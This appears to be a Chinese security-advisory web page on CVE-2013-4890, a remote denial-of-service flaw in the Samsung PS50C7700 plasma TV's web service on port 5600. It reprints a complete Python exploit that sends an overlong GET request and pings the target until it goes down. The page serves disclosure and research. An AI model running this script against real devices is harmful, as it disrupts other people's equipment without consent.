Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Samsung PS50C7700 3D Plasma-TV拒绝服务漏洞(CVE-2013-4890)

发布日期:2013-07-21
更新日期:2013-07-25受影响系统:
Samsung PS50C7700 3D Plasma-TV
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 61391
CVE(CAN) ID: CVE-2013-4890Samsung PS50C7700 3D Plasma-TV是款等离子电视。Samsung PS50C7700 3D Plasma-TV存在远程拒绝服务漏洞,攻击者通过发送超长的HTTP GET请求利用此漏洞,造成端口TCP 5600上的Web服务(DMCRUIS/0.1)崩溃,导致拒绝服务。<*来源:Malik Mesellem
 
  链接:http://packetstormsecurity.com/files/122502/samsungtv5600-dos.txt
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python#Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com
#Exploit: Denial of Service (DoS) attack
#Description: Resets some Samsung TVs
#The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#Tested successfully on my Samsung PS50C7700 plasma TV :)import httplib
import sys
import osprint "  ***************************************************************************************"
print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com "
print " Exploit: Denial of Service (DoS) attack "
print " Description: Resets some Samsung TVs "
print "   The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "   Tested successfully on my Samsung PS50C7700 plasma TV :) "
print "  *************************************************************************************** "#Sends the payload
print "  Sending the malicious payload... "
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()#Checks the response
print "  Checking the status... (CTRL+Z to stop) "
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down! "建议:
--------------------------------------------------------------------------------
厂商补丁:Samsung
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.samsung.com/Dell OpenManage Server Administrator "file"参数开放重定向漏洞Linux Kernel本地拒绝服务漏洞(CVE-2013-4163)相关资讯      Samsung PS50C7700 3D Plasma-TV  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导
    版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图